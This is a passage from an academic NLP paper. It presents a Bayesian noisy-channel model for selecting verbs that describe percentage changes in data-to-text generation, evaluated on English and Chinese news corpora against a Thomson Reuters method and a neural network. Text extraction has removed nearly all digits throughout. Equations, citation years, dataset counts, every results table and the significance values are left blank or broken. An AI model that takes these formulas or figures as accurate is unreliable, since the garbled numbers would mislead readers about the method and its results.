ramos-soto et al. ( ) also address the surface realization of weather trend data by creating an “intermediate language” for temper- ature, wind etc. and then using four different ways to verbalize temperatures based on the minimum, maximum and trend in the time frame considered. an empirical corpus-based study of human-written weather forecasts has been conducted in sumtime- mousam (reiter et al., ), and one aspect of their research focused on verb selection in weather forecasts. they built a classifier to predict the choice of verb based on type (speed vs. direction), informa- tion content (change or transition from one wind state to another) and near-synonym choice. there is more and more interest in using nlg to enhance acces- sibility, for example by describing data in the form of graphs etc. to visually impaired people. in such nlg systems, there has also been exploration into the generation of text for trend data which should be au- tomatically adapted to users’ reading levels (moraes et al., ). there exists wide-spread usage of nlg systems on the financial and business data. for ex- ample, the spotlight system developed at a.c. nielsen automatically generated readable english text based on the analysis of large amounts of retail sales data. for another example, in forbes re- ported that factset used nlg to automatically write hundreds of thousands of company descriptions a day. it is not difficult to imagine that different kinds of such data-to-text nlg systems can be utilized by a modern chatbot like amazon echo or microsoft xiaoice (shum et al., ) to enable users access a variety of online data resources via natural language conversation. typically, a complete data-to-text nlg system im- plements a pipeline which involves both content se- lection (“what to say”) and surface realization (“how to say”). in recent years, researchers have made much progress in the end-to-end joint optimization of those two aspects: angeli et al. ( ) treat the generation process as a sequence of local decisions represented by log-linear models; konstas and lapata ( ) employ a probabilistic context-free grammar (pcfg) specifying the structure of the event records and complement it with an n-gram language model as well as a dependency model; the most advanced method to date is the lstm recurrent neural net- work (rnn) based encoder-aligner-decoder model proposed by mei et al. ( ) which is able to learn content selection and surface realization together di- rectly from database-text pairs. the verb selection problem that we focus on in this paper belongs to the lexicalization step of content selection, more specifi- cally, sentence planning. similar to the above men- tioned joint optimization methods, our approach to verb selection is also automatic, unsupervised, and domain-independent. it would be straightforward to generalize our proposed model to select other types of words (like adjectives and adverbs), or even textual templates as used by angeli et al. ( ), to describe numerical data. due to its probabilistic nature, our proposed model could be plugged into, or interpo- lated with, a bigger end-to-end probabilistic model (konstas and lapata, ) relatively easily, but it is not obvious how this model could fit into a neural architecture (mei et al., ). the existing work on lexicalization that is most similar to ours is a corpus based method for verb se- lection developed by smiley et al. ( ) at thomson reuters. they analyze the usage patterns of verbs expressing percentage changes in a very large corpus, the reuters news archive. for each verb, they cal- culate the interquartile range (iqr) of its associated percentage changes in the corpus. given a new per- centage change, their method randomly selects a verb from those verbs whose iqrs cover the percentage in question, with equal probabilities. a crowdsourcing based evaluation has demonstrated the superiority of their verb selection method to the random baseline that just chooses verbs completely randomly. it is notable that their method has been incorporated into thomson reuters eikontm, their commercial data- to-text nlg software product for macro-economic indicators and mergers-and-acquisitions deals (pla- chouras et al., ). we will make experimental comparisons between our proposed approach and theirs in section . data . the wsj corpus the first (and main) dataset that we have used to investigate the problem of verb selection is bllip - wall street journal (wsj) corpus release which contains a three-year wall street journal (wsj) collection of , stories from acl/dci (ldc t ), approximately million words (char- niak et al., ). we first utilized the stanford corenlp (manning et al., ) toolkit to extract “relation triples” from all the documents in the dataset, via its open-domain information extraction (openie) functionality. then, with the help of part-of-speech (pos) tagging pro- vided by the python package nltk (bird et al., ), we filtered the extracted relation triples and retained only those expressing a percentage change https://stanfordnlp.github.io/corenlp/ http://www.nltk.org/ in the following format: google’s revenue︸ ︷︷ ︸ subject rose︸ ︷︷ ︸ verb . %︸ ︷︷ ︸ percentage . here the numerical value of percentage change could be written using either the symbol % or the word percent. note that all auxiliary verbs (including modal verbs) would have been removed, and lemma- tization (manning et al., ; jurafsky and martin, ) would have been applied to all main verbs so that the different inflectional forms of the same verb would be reduced to their common base form. after extracting , candidate triples for a to- tal of , verbs, we eliminated rare verbs which occur less than times in the dataset. furthermore, we manually annotated the direction of each verb as upward or downward, and discarded the verbs like yield which do not indicate the direction of per- centage change. the above preprocessing left us with (normalized) verbs of which are upward and are downward. there are , verb-percentage pairs in total. furthermore, it is found that most of the per- centage changes in this dataset reside within the range [ %, %]. only a tiny portion of percentage changes are beyond that range: . % for upward verbs and . % for downward verbs. those out-of- range percentage changes are considered outliers and are excluded from our study in this paper, though the way to relax this constraint will be discussed later in section . . the reuters corpus we have also validated our model in a widely-used public dataset, the reuters- text categorization collection . it is a collection of , documents that appeared on reuters newswire in . the doc- uments were assembled and indexed with categories, but they were not needed in this paper. the same preprocessing as on the wsj corpus has been applied to this dataset, except that the minimum occurring frequency of verbs was not but times due to the smaller size of this dataset. after manual annotation and filtering, we ended up with verbs in- cluding upward ones and downward ones. there are verb-percentage pairs in total. https://goo.gl/nrofu . the chinese corpus furthermore, to verify the effectiveness of our ap- proach in other languages, we have also made use of the chinese gigaword ( th edition) dataset. it is a comprehensive archive of newswire text data that has been acquired from eight distinct sources of chinese newswire by ldc over a number of years (ldc t ), and contains more than million sentences. since we could not find any open-domain infor- mation extraction toolkit for “relation triples” in chi- nese, we resorted to regular expression matching to extract, from chinese sentences, the expressions of percentage together with their local contexts. a num- ber of regular expression patterns have been utilized to ensure that they could cover all the different ways to write a percentage in chinese. then, after pos tagging, we would be able to identify the verb imme- diately preceding each percentage if it is associated with one. for our application, a big difference between chi- nese and english is that the available choices of verbs to express upward or downward percentage changes are pretty limited in chinese: the variation in fact mostly comes from the adverb used together with the verb. therefore, when we talk about the prob- lem of chinese verb selection in this paper, we ac- tually mean the choice of not just verbs but instead adverb+verb combinations, e.g., 狂升 (rise crazily) and 略降 (fall slightly). our proposed probabilistic model for verb selection, described below in sec- tion , can be extended straightforwardly to such generalized chinese “verbs”. similar to the preprocessing of other datasets, rarely occurring verbs with frequency less than would have been filtered out. in the end, we got chinese verbs of which are upward and are downward. there are , verb-percentage pairs in total. approach in this section, we propose to formulate the task of verb selection for data-to-text nlg (see section ) as a supervised learning problem (hastie et al., ) and to address it using shannon’s noisy-channel model (shannon, ). for each of the two possible change directions (upward and downward), we need to build a specific model. without loss of generality, in the subsequent discussion, we focus on selecting the verbs of one particular direction; the way to deal with the other direction is exactly the same. thus a percentage change is fully specified by its magnitude in one model. the set-up of our supervised learning problem is as follows. suppose that we have a set of training ex- amples d = {(x ,w ), . . . , (xn,wn )}, where each example consists of a percentage change xi paired with the verb wi used by the human author to express that percentage change. such training data could be obtained from a large corpus as described in sec- tion . let x denote the set of possible percentage changes: as mentioned earlier, in this paper we as- sume that x = [ %, %]. let v denote the set of possible verbs, i.e., the vocabulary. our task is to learn a predictive function f : x →v that can map any given percentage change x to an appropriate verb w = f(x). apparently, there is inherent uncertainty in the above described process of predicting the choice of verbs for a percentage change. making use of probabilistic reasoning, the principled approach to handling uncertainties, we argue that the function f should be determined by the posterior probability p(w|x). however, it looks difficult to directly es- timate the parameters of such a conditional model, aka discriminative model, for every possible value of x which is a continuous variable. hence, we turn to the easier alternative way often used in machine learning: to construct a generative model. rather than directly estimating the conditional probability distribution, we instead estimate the joint probability p(x,w) over (x,w) pairs in the generative model. the joint probability can be decomposed as follows: p(x,w) = p(w)︸ ︷︷ ︸ prior p(x|w)︸ ︷︷ ︸ likelihood , ( ) where p(w) is the prior probability distribution over verbs w, and p(x|w) is the likelihood, i.e., the prob- ability of seeing the percentage change x given that the associated verb is w. the benefit of making the above decomposition is that the parameters of p(w) and p(x|w) can be estimated separately. given such a generative model, we can then use the bayes rule to derive the posterior probability p(w|x) for any new example of x: p(w|x) = p(w)p(x|w) p(x) , ( ) where p(x) = ∑ w∈v p(x,w) = ∑ w∈v p(w)p(x|w) ( ) is the model evidence acting as the normalizing con- stant in the formula. intuitively, this generative model could be consid- ered as a noisy-channel (shannon, ). when we see a percentage change x, we can imagine that it has been generated in two steps (raviv, ). first, a verb w would be chosen with the prior probability p(w). second, the verb w would be passed through a communication “channel” and be corrupted by the “noise” to produce the percentage change x according to the likelihood function (aka the channel model) p(x|w). in other words, the percentage change x that we see is actually the distorted form of its associated verb w. an alternative, but equivalent, interpretation is that when a pair (x,w) is passed through the noisy- channel, the verb w will be lost and finally only the percentage change x will be seen. the task is to recover the lost w based on the observed x. shannon’s noisy-channel model is in fact a kind of bayesian inference. it has been applied to many nlp tasks such as text categorization, spell checking, question answering, speech recognition, and machine translation (jurafsky and martin, ). our appli- cation — probabilistic verb selection — is different from them because the observed data are continu- ous real-valued numbers but not discrete symbols. more importantly, in most of those applications such as text categorization using the naı̈ve bayes algo- rithm (manning et al., ), the objective is “decod- ing”, i.e., to find the single most likely label w∗ for any given input x from the model w∗ = arg max w∈v p(w|x) = arg max w∈v p(w)p(x|w)/p(x) = arg max w∈v p(w)p(x|w) , ( ) and therefore the normalizing constant p(x) does not need to be calculated. however, this is actually undesirable for the task of verb selection, because it implies that the a percentage change x would always be expressed by the same “optimal” verb w∗ corre- sponding to it. to achieve variation and naturalness, we must maintain the diversity of word usage. so the right method to generate a verb w for the given percentage change x is to compute the posterior prob- ability distribution p(w|x) over all the possible verbs in the vocabulary v using eq. ( ) and then randomly sample a verb from that distribution. although this means that the normalizing constant p(x) needs to be calculated each time, the computation is still effi- cient, as unlike in many other applications the vocab- ulary size |v| is a quite small number in practice (see section ). in the following two subsections, we study the two components of our proposed probabilistic model for verb selection, the prior probability distribution and the likelihood function, respectively. . prior the prior probability distribution p(w) could sim- ply be obtained by maximum likelihood estimation (mle): p(w)mle = nw/n , ( ) where nw is the number of training examples with the verb w, and n is the total number of training examples. the relationship between a verb’s rank and fre- quency in the wsj corpus is depicted by the log-log plot fig. , revealing that the empirical distribution of verbs follows the zipf ’s law (powers, ), which is related to the power law (adamic, ; newman, ). specifically, the frequency of the i-th popular verb, fi, is proportional to /is, where s is the ex- ponent characterizing the distribution (shown as the slope of the straight line in the corresponding log-log plot). this implies that in the context of expressing percentage changes, the human choice of verbs is dominated by a few frequently used ones, and many other verbs are only used very occasionally. smoothing: if we would like to intentionally boost the diversity of verb choices, we could mitigate the high skewness of the empirical distribution of verbs by smoothing (zhai and lafferty, ). a simple smoothing technique suitable for this purpose is the jelinek-mercer smoothing (jelinek and mercer, ) . . . . . . log(rank) lo g( fre q) (a) upward verbs . . . . . . log(rank) lo g( fre q) (b) downward verbs figure : the empirical distribution of verbs p(w)mle follows the zipf’s law, in the wsj corpus. which uses a linear interpolation between the maxi- mum likelihood estimation of a verb w’s prior proba- bility distribution with the uniform distribution over the vocabulary of verbs v, i.e., p(w) = λp(w)mle + ( −λ) |v| , ( ) where p(w)mle is given by eq. ( ), and the parame- ter λ ∈ [ , ] provides a means to explicitly control the trade-off between accuracy and diversity. the smaller the parameter λ is, the more diverse the gen- erated verbs would be. when λ = , the prior prob- ability is completely ignored and the selection of a verb solely depends on how compatible the verb is with the given percentage change. when λ = , it backs off to the original model without smoothing. the optimal value of the parameter λ could be tuned on a development set (see section . ). . likelihood for each verb w ∈v, we analyze the distribution of its associated percentage changes and calculate the following descriptive statistics: mean, standard devi- ation (std), skewness, kurtosis, median, and interquar- tile range (iqr). all those descriptive statistics for the wsj corpus are given in table . in addition, fig. shows the box plots of percentage changes for top- (most frequent) verbs in the wsj corpus, where the rectangular box corresponding to each verb represents the span from the first quartile to the third quartile, i.e., the interquartile range (iqr), with the segment inside the box indicating the median and the whiskers outside the box indicating the rest of the distribution (except for the points that are determined to be “outliers” using the so-called tukey box plot method). it can be seen that the choice of verbs often im- ply the magnitude of percentage change: some verbs (such as soar and plunge) are mostly used to ex- press big changes (large medians), while some verbs (such as advance and ease) are mostly used to express small changes (small medians). generally speaking, the former is associated with a relatively wide range of percentage changes (large iqrs) while the latter is associated with a relatively narrow range of percentage changes (small iqrs). moreover, it is interesting to see that for almost all the verbs, the distribution of percentage changes is heavily skewed to the left side (i.e., smaller changes). given a new percentage change x, in order to cal- culate its probability of being generated from a verb w in the above described generative model, we need to fit the likelihood function, i.e., the probability dis- tribution p(x|w), for each word w ∈ v, based on the training data. one common technique for this purpose is kernel density estimation (kde) (hastie et al., ), a non- parametric way to estimate the probability density function as follows: p(x|w) = nwh nw∑ i= k ( x−xi h ) , ( ) verbs mean std skewness kurtosis median iqr upward rise . . . . . [ . , . ] increase . . . . . [ . , . ] grow . . . . . [ . , . ] climb . . . . . [ . , . ] jump . . . - . . [ . , . ] surge . . . - . . [ . , . ] gain . . . . . [ . , . ] soar . . . - . . [ . , . ] raise . . . . . [ . , . ] advance . . . . . [ . , . ] boost . . . . . [ . , . ] downward fall . . . . . [ . , . ] decline . . . . . [ . , . ] drop . . . . . [ . , . ] slip . . . . . [ . , . ] plunge . . . - . . [ . , . ] slide . . . - . . [ . , . ] lose . . . . . [ . , . ] tumble . . . . . [ . , . ] plummet . . . - . . [ . , . ] ease . . . . . [ . , . ] decrease . . . . . [ . , . ] reduce . . . . . [ . , . ] dip . . . . . [ . , . ] shrink . . . . . [ . , . ] table : the descriptive statistics of percentage changes (in %) for each verb, in the wsj corpus. percent rise increase climb grow gain jump soar surge raise advance ve rb (a) upward verbs percent fall decline drop tumble slip lose plunge ease slide plummet ve rb (b) downward verbs figure : the box plots of percentage changes (in %) for the top- verbs, in the wsj corpus. where nw is the number of training examples with the verb w, k(·) is the kernel (a non-negative func- tion that integrates to one and has mean zero), and h > is a smoothing parameter called the bandwidth. fig. shows the likelihood function p(x|w) fitted by kde with gaussian kernels and automatic band- width determination using the rule of scott ( ), for the most popular upward and downward verbs in the wsj corpus: rise and fall. it is also possible to fit a parametric model of p(x|w) which would be more efficient than kde. since in this paper x is assumed to be a continuous random variable within the range [ %, %] (see section ), we choose to fit p(x|w) with the beta . . . . . (a) the verb rise . . . . . (b) the verb fall figure : the likelihood function p(x|w) fitted by kernel density estimation (kde). . . . . . (a) the verb rise . . . . . (b) the verb fall figure : the likelihood function p(x|w) fitted by the beta distribution. distribution which is a continuous distribution sup- ported on the bounded interval [ , ]: p(x|w) = beta(α,β) = Γ(α + β) Γ(α)Γ(β) xα− ( −x)β− . ( ) although there exist a number of continuous dis- tributions supported on the bounded interval such as the truncated normal distribution, the beta dis- tribution is picked here as it has the ability to take a great variety of different shapes using only two parameters α and β. these two parameters can be es- timated using the method of moments, or maximum likelihood. for example, using the former, we have α̂ = x̄ ( x̄( −x̄) v̄ − ) and β̂ = ( −x̄) ( x̄( −x̄) v̄ − ) if v̄ < x̄( − x̄), where x̄ and v̄ are the sample mean and sample variance respectively. fig. shows the likelihood function p(x|w) fitted by the beta dis- tribution using scipy for the most popular upward and downward verbs in the wsj corpus: rise and fall. experiments . baselines thomson reuters: the only published approach that we are aware of to this specific task of verb selec- tion in the context of data-to-text nlg is the method adopted by thomson reuters eikontm (smiley et al., ). this baseline method’s effectiveness has been verified through crowdsourcing, as we have mentioned before (see section ). furthermore, it is fairly new (published in ), therefore should https://www.scipy.org/ represent the state of the art in this field. note that their model was not taken off-the-shelf but re-trained on our datasets to ensure a fair comparison with our approach. neural network: another baseline method that we have tried is a feed-forward artificial neural net- work with hidden layers, aka, a multi-layer percep- tron (russell and norvig, ; goodfellow et al., ). it is because neural networks are well-known universal function approximators, and they represent quite a different family of supervised learning algo- rithms. unlike our proposed probabilistic approach which is essentially a generative model, the neural network used in our experiments is a discrimina- tive model which takes the percentage change in- put (represented as a single floating-point number) and then predicts the verb choice directly. since we would like to have probability estimates for each verb, the softmax function was used for the output layer of neurons, and the network was trained via back-propagation to minimize the cross-entropy loss function. an l regularization term was also added to the loss function that would shrink model param- eters to prevent overfitting. the activation function was set to the rectified linear unit (relu) (hahn- loser et al., ). the adam optimization algo- rithm (kingma and ba, ) was employed as the solver, with the samples shuffled after each iteration. the initial learning rate was set to . , and the maximum number of iterations (epochs) was set to . for our datasets, a single hidden layer of neurons would be sufficient and adding more neu- rons or layers could not help. this was found using the development set through a line search from to hidden neurons with step size . note that when applying the trained neural network to select verbs, we should use not argmax but sampling from the predicted probability distribution (given by the softmax function), in the same way as we do in our proposed probabilistic model (see section ). . code the python code for our experiments, along with the datasets of verb-percentage pairs extracted from those three corpora (see section ), have been made available to the research community . https://goo.gl/gkj fa . automatic evaluation the end users’ perception of a verb selection algo- rithm’s quality depends on not only how accurately the chosen verbs reflect the corresponding percent- age changes but also how diverse the chosen verbs are, which are two largely orthogonal dimensions for evaluation. accuracy: the easiest way to assess the accuracy of an nlg method or system is to compare the texts generated by computers and the texts written by hu- mans for the same input data (mellish and dale, ; reiter and belz, ), using an automatic metric such as bleu (papineni et al., ). for our task of verb selection, we decide to use the metric mrr that stands for mean reciprocal rank (voorhees, ; radev et al., ) and can be calculated as follows: mrr = |q| ∑ (x′i,w ′ i)∈q rank(w′i) , ( ) where q = {(x′ ,w′ ), . . . , (x′m,w′m )} is the set of test examples, and rank(w′i) refers to the rank po- sition of w′i — the verb really used by the human author to describe the percentage change x′i — in the list of predicted verbs ranked in the descending order of their probabilities of correctness given by the model. the mrr metric is most widely used for the evaluation of automatic question answering which is similar to automatic verb selection in the following sense: they both aim to output just one suitable response (answer or verb) to any given input (question or percentage change). through -fold cross-validation (hastie et al., ), we have got the mrr scores of our proposed model (see section ) and the two baseline mod- els (see section . ) which are shown in table . the models were trained/tested separately on each dataset (see section ). in each round of -fold cross- validation, % of the data would become the test set; in the remaining % of the data, randomly selected % would be the training set and the other % would be the development set if parameter tuning is needed (otherwise the whole % would be used for training). the parameter λ of our model controls the strength of smoothing over the prior probability (see sec- tion . ) and thus dictates the trade-off between ac- curacy and diversity. if we focus on the accuracy corpus method upward verbs downward verbs wsj thomson reuters . ± . . ± . neural network . ± . . ± . our approach (λ = , kde) . ± . . ± . our approach (λ = , beta) . ± . . ± . our approach (λ = . , kde) . ± . . ± . our approach (λ = . , beta) . ± . . ± . reuters thomson reuters . ± . . ± . neural network . ± . . ± . our approach (λ = , kde) . ± . . ± . our approach (λ = , beta) . ± . . ± . our approach (λ = . , kde) . ± . . ± . our approach (λ = . , beta) . ± . . ± . chinese thomson reuters . ± . . ± . neural network . ± . . ± . our approach (λ = , kde) . ± . . ± . our approach (λ = , beta) . ± . . ± . our approach (λ = . , kde) . ± . . ± . our approach (λ = . , beta) . ± . . ± . table : the accuracy of verb selection measured by mrr (mean±std) via -fold cross-validation. only and ignore the diversity, the optimal value of λ should just be (i.e., no smoothing). in order to strike a healthy balance between accuracy and diver- sity, we carried out a line search for the value of λ from to with step size . using the development set. it turned out that the smoothing effect upon diver- sity would only become noticeable when λ ≤ . , so we further conducted a line search from to . with step size . , and found that using λ = . consis- tently yield a good performance on different corpora. actually, this phenomenon should not be very sur- prising, given the zipfian distribution of verbs which is highly skewed (see fig. ). our observation in the experiments still indicate that smoothing with a none-zero λ worked better than setting λ = . that is to say, it would not be wise to go to extremes to ignore the prior entirely which would unnecessarily harm the accuracy. an alternative smoothing solution for mitigating the severe skewness of the empirical prior that we also considered is to make the smoothed prior probability proportional to the logarithm of the raw prior probability, but we did not take that route as (i) we could not find a good principled interpreta- tion for such a trick and; (ii) using a small λ value like . seemed to work sufficiently well. it will be shown later that sampling verbs from the posterior probability distribution rather than just using the one with the maximum probability would help to alleviate the problem of prior skewness and thus prevent verb selection from being dominated by the most popular verbs. it can be observed from the experimental results that smoothing (see section . ) does reduce the accuracy of verb selection. the mrr scores with λ = . are lower than those with λ = . nev- ertheless, as we shall soon see, strong smoothing is crucially important for achieving a good level of diversity. furthermore, there seemed to be little per- formance difference between the usage of the kde technique or the beta distribution to fit the likelihood function in our approach. this suggests that the latter is preferable because it is as effective as the former but much more efficient. therefore, in the remaining part of this paper, we shall focus on this specific ver- sion of our model (with λ = . , beta) even though it may not be the most accurate. the mrr scores achieved by our approach are around . – . which implies that, on average, the first or the second verb selected by our approach would be the “correct” verb used by human authors. across all the three corpora, our proposed proba- bilistic model, whether it is smoothed or not, whether it uses the kde technique or the beta distribution, outperforms the thomson reuters baseline by a large margin in terms of mrr. according to the wilcoxon signed-rank test (wilcoxon, ; kerby, ), the performance improvements brought by our approach over the thomson reuters baseline are statistically significant with the (two-sided) p-value � . on the two english corpora and = . on the chinese corpus. with respect to the neural network baseline, on all the three corpora, its accuracy is slightly better than that of our smoothed model (λ = . ) though it still could not beat our original unsmoothed model (λ = ). the major problem with the neural net- work baseline is that, similar to the probabilistic model without smoothing, its verb choices would concentrate on the most frequent ones and thus have very poor diversity. a prominent advantage of our proposed probabilistic model, in comparison with discriminative learning algorithms such as the neural network baseline, is that we are able to explicitly control the trade-off between accuracy and diversity by adjusting the strength of smoothing. it is worth emphasizing that the accuracy of a verb selection method only reflects its ability to imitate how writers (journalists) use verbs, but this is not necessarily the same as how readers interpret the verbs. usually the ultimate goal of an nlg sys- tem is to successfully communicate information to readers. previous research in nlg and psychology suggests that there is wide variation in how different people interpret verbs and words in general, which is probably much larger in the general population than amongst journalists. specifically, the mrr metric would probably underestimate the effectiveness of a verb selection method, since a verb different from the one really used by the writer is not necessarily a less appropriate choice for the corresponding percentage change from the reader’s perspective. diversity: other than the accuracy of reproducing the verb choices made by human authors, verb selec- tion methods could also be automatically evaluated in terms of diversity. following kingrani et al. ( ), we borrow the diversity measures from ecology (magurran, ) to quantitatively analyze the diversity of verb choices: each specific verb is considered as a particular species. when measuring the biological diversity of a habitant, it is important to consider not only the number of distinct species present but also the rela- tive abundance of each species. in the literature of ecology, the former is called richness and the latter is called evenness. here we utilize the well-known inverse simpson index aka simpson’s reciprocal in- dex (simpson, ) which takes both richness and evenness into account: d = (∑r i= p i )− , where r is the total number of distinct species (i.e., rich- ness), and pi is the the proportion of the individuals belonging to the i-th species relative to the entire population. the evenness is given by the value of diversity normalized to the range between and , so it can be calculated as d/r. table shows the diversity scores of verb choices made by our approach and the thomson reuters base- line for randomly sampled percentage changes (see section . ). overall, in terms of diversity, our approach would lose to thomson reuters. the neu- ral network baseline is omitted here because its di- versity scores were very low. discussion: figs. and show the confusion ma- trices of our approach (λ = . , beta) on the wsj corpus as (row-normalized) heatmaps: in the former we choose the verb with the highest posterior proba- bility (argmax) while in the latter we sample the verb from the posterior probability distribution (see sec- tion ). the argmax way would be dominated by a few verbs (e.g., “rise”, “soar”, “fall”, and “plummet”). in contrast, random sampling would lead to a much wider variety of verbs. the experimental results of all verb selection methods reported in this paper are generated by the sampling strategy, if not indicated otherwise. it can be seen from fig. that the verbs “soar” and “plunge” are the easiest to be predicted. generally speaking, the prediction of verbs is rela- tively more accurate for bigger percentage changes, whether upwards or downwards. this is probably be- cause there are fewer verbs available to describe such radical percentage changes (see fig. ) and thus the model faces less uncertainty. most misclassification (confusion) happens when a verb is incorrectly pre- dicted to be the most frequent one (“rise” or “fall”). . human evaluation the two aspects, accuracy and diversity, are both im- portant for the task of verb selection. although we have shown that automatic evaluation could be car- ris e in cr ea se gr ow cl im b ju m p su rg e ga in so ar ra is e ad va nc e bo os t rise increase grow climb jump surge gain soar raise advance boost . . . . . . (a) upward verbs fa ll de cl in e dr op sl ip pl un ge sl id e lo se tu m bl e pl um m et ea se de cr ea se re du ce di p sh rin k fall decline drop slip plunge slide lose tumble plummet ease decrease reduce dip shrink . . . . . (b) downward verbs figure : the confusion matrix heatmap of our approach on the wsj corpus: choosing the verb with the highest posterior probability. ris e in cr ea se gr ow cl im b ju m p su rg e ga in so ar ra is e ad va nc e bo os t rise increase grow climb jump surge gain soar raise advance boost . . . . . (a) upward verbs fa ll de cl in e dr op sl ip pl un ge sl id e lo se tu m bl e pl um m et ea se de cr ea se re du ce di p sh rin k fall decline drop slip plunge slide lose tumble plummet ease decrease reduce dip shrink . . . . . . (b) downward verbs figure : the confusion matrix heatmap of our approach on the wsj corpus: sampling the verb from the posterior probability distribution. corpus method upward verbs downward verbs richness evenness diversity richness evenness diversity wsj our approach . . . . thomson reuters . . . . reuters our approach . . . . thomson reuters . . . . chinese our approach . . . . thomson reuters . . . . table : the diversity of verb selection measured by the inverse simpson index. corpus verbs our approach vs thomson reuters our approach vs neural network > < ≈ p-value > < ≈ p-value wsj upward . . downward . . both . . reuters upward . . downward . . both . . chinese upward . � . downward . . both . � . all both . � . table : the results of human evaluation, where the p-values are given by the sign test (two-sided). ried out for either accuracy or diversity alone, there is no obvious way to assess the overall effectiveness of a verb selection method using machines only. the ultimate judgment on the quality of verb selection would have to come from human assessors (mellish and dale, ; reiter and belz, ; smiley et al., ). to manually compare our approach (the version with λ = . , beta) with a baseline method (thom- son reuters or neural network), we conduct a ques- tionnaire survey with multiple-choice questions. in each question, a respondent would see a pair of generated sentences describing the same percentage change with the verbs selected by two different meth- ods respectively and need to judge which one sounds better than the other (or it is hard to tell). for exam- ple, a respondent could be shown the following pair of generated sentences: ( ) net profit declines % ( ) net profit plummets % and then they were supposed to choose one of the three following options as their answer: [a] sentence ( ) sounds better. [b] sentence ( ) sounds better. [c] they are equally good. the respondents would be blinded to whether the first verb or the second verb was provided by our proposed method, as their appearing order would have been randomized in advance. the questionnaire survey system withheld the information about the source of each verb until the answers from all respondents had been collected, and then it would count how many times the verb selected by our proposed method was deemed better than (>), worse than (<), or as good as (≈) the verb selected by the baseline method. for each corpus, we produced different ques- tions, of which half were about upward verbs and half were about downward verbs. as we have explained above, each question compares a pair of generated sentences describing the same percentage change with different verbs. the sentence generation process is the same as that used by smiley et al. ( ). the subjects were randomly picked from the most popular ones in the corpus (e.g., “gross domestic product”), and the percentage changes (as the objects) were ran- domly sampled from the corpus as well. each of the two verb selection methods, in comparison, would provide one verb (as the predicate) for describing that specific percentage change. note that in this sentence generation process, a pair of sentences would be re- tained only if the verbs selected by the two methods were different, as it would be meaningless to compare two identical sentences. a total of college-educated people participated in the questionnaire survey. they are all bilingual, i.e., native or fluent speakers of both english and chinese. each person was given questions: questions (including upward and downward ones) from each corpus. we (the authors of this paper) were excluded from participating in the questionnaire survey to avoid any conscious or unconscious bias. the results of human evaluation are shown in ta- ble . altogether, respondents prefer the verb se- lected by our approach / = % of times, as opposed to / = % for the thomson reuters baseline; respondents prefer the verb selected by our approach / = % of times, as opposed to / = % for the neural network baseline. according to the sign test (wackerly et al., ), our approach works significantly better than the two baseline methods, thomson reuters and neural net- work: overall the (two-sided) p-values are less than . . discussion: our approach exhibits more superior- ity over the thomson reuters baseline on the english datasets than on the chinese dataset. since the chi- nese dataset is bigger than the reuters dataset, though smaller than the wsj dataset, the performance differ- ence is not caused by corpus size but due to language characteristics. remember that for chinese we are actually predicting adverb+verb combinations (see section . ). retrospective manual inspection of the experimental results suggests that users seem to have relatively higher expectations of diversity for chinese adverbs than for english verbs. extensions robustness: it is still possible, though very un- likely, for the proposed probabilistic model to gen- erate atypical uses of a verb. a simple measure to avoid such situations is to reject the sampled verb w∗ if the posterior probability p(w∗|x) < τ where τ is a predefined threshold, e.g., %, and then resample w∗ until p(w∗|x) ≥ τ. unlimited range: if the magnitude of a percent- age change is allowed to go beyond %, we would no longer be able to use the beta distribution to fit the likelihood function p(x|w) as it is supported on a bounded interval. however, it should be straight- forward to use a flexible probability distribution sup- ported on the semi-infinite interval [ , +∞], such as the gamma distribution. subject: the context, in particular the subject of the percentage change, has not been taken into ac- count by the presented models. as illustrated by the two example sentences below, the same verb (“surge”) could be used for quite different percentage changes (“ %” vs “ %”) depending on the subject (“wheat price” vs “inflation”). • “according to world bank figures, wheat prices have surged up by percent in the past three years to february .” • “while inflation has surged to almost % in , it is projected by the commission to fall in .” furthermore, the significance of a percentage change often depends on the domain, and consequently, so does the most appropriate verb to describe a per- centage change. for example, a % increase in stock price is interesting, while a % increase in body temperature is life-threatening. it is, of course, possible to incorporate the subject information into our probabilistic model by extending eq. ( ) to p(w|x,s) = p(w,s)p(x|w,s)/p(x,s) where s is the subject word in the triple. on one hand, this should make the model more effective, for the rea- sons explained above. on the other hand, this would require a lot more data for reliable estimation of the model parameters, which is one of the reasons why we leave it for future work. language modeling: thanks to its probabilistic nature, our proposed model for verb selection could be seamlessly plugged into an n-gram statistical lan- guage model (jurafsky and martin, ), e.g., for the msr sentence completion challenge . this might be able to reduce the language model’s perplex- ity, as the probability of 〈subject, verb, percentage〉 triples could be calculated more precisely. hierarchical modeling: the choice of verb to de- scribe a particular percentage change could be af- fected by the style of the author, the topic of the document, and other contextual factors. to take those dimensions into account and build a finer prob- abilistic model for verb selection, we could embrace bayesian hierarchical modeling (gelman et al., ; kruschke, ) which, for example, could let each author’s model borrow the “statistical power” from other authors’. psychology: there exist a lot of studies in psy- chology on how people interpret probabilities and risks (reagan et al., ; berry et al., ). they could provide useful insights for further enhancing our verb selection method. conclusions the major research contribution of this paper is a probabilistic model that can select appropriate verbs https://goo.gl/yykbya to express percentage changes with different direc- tions and magnitudes. this model is not relying on hard-wired heuristics, but learned from training ex- amples (in the form of verb-percentage pairs) that are extracted from large-scale real-world news corpora. the choices of verbs made by the proposed model are found to match our intuitions about how differ- ent verbs are collocated with percentage changes of different sizes. the real challenge here is to strike the right balance between accuracy and diversity, which can be realized via smoothing. our experi- ments have confirmed that the proposed model can capture human authors’ pattern of usage around verbs better than the existing method currently employed by thomson reuters eikontm. we hope that this probabilistic model for verb selection could help data- to-text nlg systems achieve greater variation and naturalness. acknowledgments the research is partly funded by the national key r&d program of china (id: yfc ) and the nsfc grant (no. ). the titan x pascal gpu used for our experiments was kindly donated by the nvidia corporation. prof xuanjing huang (fudan) has helped with the datasets. we thank the anonymous reviewers and the ac- tion editor for their constructive and helpful com- ments. we also gratefully acknowledge the support of geek.ai for this work. references lada a adamic. . zipf, power-laws, and pareto — a ranking tutorial. technical report, hp labs. gabor angeli, percy liang, and dan klein. . a simple domain-independent probabilistic approach to generation. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . anja belz and eric kow. . system building cost vs. output quality in data-to-text generation. in pro- ceedings of the th european workshop on natural language generation (enlg), pages – . anja belz. . automatic generation of weather fore- cast texts using comprehensive probabilistic generation- space models. natural language engineering (nle), ( ): – . dianne berry, theo raynor, peter knapp, and elisabetta bersellini. . over the counter medicines and the need for immediate action: a further evaluation of eu- ropean commission recommended wordings for com- municating risk. patient education and counseling, ( ): – . steven bird, ewan klein, and edward loper. . natu- ral language processing with python: analyzing text with the natural language toolkit. 